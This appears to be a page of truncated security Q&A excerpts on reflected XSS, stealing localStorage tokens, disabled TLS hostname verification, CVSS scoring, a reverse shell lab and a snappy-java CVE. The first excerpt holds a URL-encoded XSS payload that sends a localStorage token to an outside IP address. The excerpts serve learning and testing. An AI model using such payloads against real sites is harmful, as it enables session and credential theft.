Collaborate Disseminate
I am trying to poc and XSS in the url, and I have it working fine with the below url:
https://example.com:15000/test/%3Cscript%20type=%22text/javascript%22%3Edocument.location=%22http://192.168.1.88:8080/%3fc=%22+localStorage.getItem(%22to… Continue reading + is decoded by the browser as space [closed]
I have an XSS vulnerability identified by <script>alert(1);</script> in the url.
So when I put it in the url it gets executed (ex: www.example.com/admin/<script>alert(1);</script> ).
I also tried after loggin in, an… Continue reading how to send cookies or token in local storage to a remote server using reflected XSS
I have an admin screen, once I access it, it asks for login credentials, then after I login, I get a token that is saved under local storage (see screenshot below)
Noting that I am using edge browser in private mode, when I opem a new tab… Continue reading Does saving the cookie or jwt token in the browser raise a security risk?
If I have a java client that connects to a server, but in the java client code where the connection is built, it skips hostname verification disabled.
When a client tries to connect to serverA.com, what is the impact if hostname verificati… Continue reading What is the impact of disabled TLS hostname verification?
While I was doing source code review of API handlers for REST APIs, I found a security issue.
This issue is that some methods have the annotation @PreAuthorize("permitAll()").
If I want to document this as a finding and give it a… Continue reading How to calculate CVSS score of a finding detected in the source code?
If I have a web app that is vulnerable to XSS in the url (reflected XSS), does CSP protect against this type of XSS?
Ex: when I run www.example.com/<script>alert(1);</script> in the browser, this will trigger a popup message.
Context:
I want to do a reverse shell POC, so I am using Kali Linux on virtual box hosted on a Windows machine. On the same network my Windows machine hosted, there is a Linux machine that I want to gain a reverse shell on it. Before doing… Continue reading how to make my vm reachable from hosts within same network [migrated]
I am trying to analyze CVE-2023-34453. As per the NVD description, there is an integer overflow error in snappy-java, specifically in the method shuffle(int[] input) in BitShuffle.java.
In a huge codeline this CVE was detected, and I want … Continue reading If a library has a vulnerable function, but my code doesn’t call it, is my code at risk? Do I need to update?
I am trying to calculate a CVSS score for a vulnerability. In my case, to exploit the vulnerability you should have network access to the server, which is sitting behind a firewall. This server is serving an application that only computers… Continue reading CVSS attack vector adjacent vs network
Is there any difference in the security of a factory reset with FBE (File-Based Encryption) on Android 10+ when not using a screen lock vs. using a screen lock before the factory reset is performed?